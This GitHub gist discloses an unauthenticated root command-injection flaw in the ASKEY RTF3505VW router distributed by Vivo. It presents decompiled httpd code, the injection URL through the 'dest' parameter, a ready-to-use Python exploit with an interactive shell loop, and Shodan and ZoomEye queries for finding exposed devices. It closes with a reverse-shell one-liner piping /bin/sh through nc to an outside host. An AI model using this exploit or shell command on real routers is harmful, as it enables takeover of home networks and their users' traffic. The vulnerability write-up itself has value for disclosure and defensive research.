Created
March 29, 2021 18:42
-
-
Save caioluders/b178a218c2f8d1762adbfb644af1401b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter | |
| ------------------------------------------------------------------------------ | |
| The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below. | |
| if (iVar1 != 0) { | |
| system("killall ping traceroute > /dev/null 2>&1"); | |
| __format = "ping %s -c %s -I %s> %s&"; | |
| puVar4 = auStack10144; | |
| LAB_00439f2c: | |
| sprintf(local_2720,__format,puVar4,&local_2870,local_2880); | |
| system(local_2720); | |
| glbPingTraceFlag = 1; | |
| } | |
| LAB_00439f2c XREF[1]: 00439dbc(j) | |
| 00439f2c 8f 99 87 d0 lw t9,-0x7830(gp)=>->sprintf = 00462750 | |
| 00439f30 03 20 f8 09 jalr t9=>sprintf int sprintf(char * __s, char * _ | |
| 00439f34 27 a7 00 20 _addiu a3,sp,0x20 | |
| 00439f38 8f bc 00 18 lw gp,local_2878(sp) | |
| 00439f3c 8f 99 8c c8 lw t9,-0x7338(gp)=>->system = 004613e0 | |
| 00439f40 03 20 f8 09 jalr t9=>system int system(char * __command) | |
| 00439f44 27 a4 01 70 _addiu a0,sp,0x170 | |
| 00439f48 8f bc 00 18 lw gp,local_2878(sp) | |
| 00439f4c 24 03 00 01 li v1,0x1 | |
| 00439f50 8f 82 80 54 lw v0,-0x7fac(gp)=>->glbPingTraceFlag = 00495440 | |
| 00439f54 08 10 e6 ec j LAB_00439bb0 | |
| 00439f58 a0 43 00 00 _sb v1,0x0(v0)=>glbPingTraceFlag | |
| The vulnerable path is "/webClient/ajax_getvar.cmd?varName=utilPing&dest=%3bls>/var/ping_trace.log%26%23&num=1&seq=0", and the command injection occurs on the "dest" parameter. To be possible to see the response of the executed command it is necessary to append the output to the "/var/ping_trace.log" file, so we can make another request and by changing the "seq" value to "1" we can see the output. | |
| exploit.py | |
| -------------------------------------------------- | |
| #!/usr/bin/env python3 | |
| # ZoomEye query : instaladorvivofibra +headers:X-XSS-Protection | |
| # Shodan query : html:instaladorvivofibra X-XSS-Protection | |
| import requests , urllib.parse | |
| from argparse import ArgumentParser | |
| def send_requests(cmd,ip) : | |
| url = "http://{}/webClient/ajax_getvar.cmd?varName=utilPing&dest=%3b{}>/var/ping_trace.log%26%23&num=1&seq={}" | |
| s1 = requests.get(url.format(ip,cmd,0)) | |
| s2 = requests.get(url.format(ip,cmd,1)) | |
| return s2.text | |
| def main(arg) : | |
| if arg.cmd : | |
| cmd = urllib.parse.quote(arg.cmd) | |
| print(send_requests(cmd,arg.target)) | |
| else : | |
| cmd = "" | |
| while cmd != "exit" : | |
| cmd = input("# ") | |
| cmd = urllib.parse.quote(cmd) | |
| print(send_requests(cmd,arg.target)) | |
| if __name__ == '__main__' : | |
| parser = ArgumentParser(description="VIVO RCE") | |
| parser.add_argument("-t", "--target", dest="target",help="Target") | |
| parser.add_argument("-c","--cmd", dest="cmd",help="Command") | |
| args = parser.parse_args() | |
| main(args) | |
| To reverse connect to the router, just do | |
| $ mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f | |
| you'll probably need to change the fd until it works. Have fun. | |
| thx crippa |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment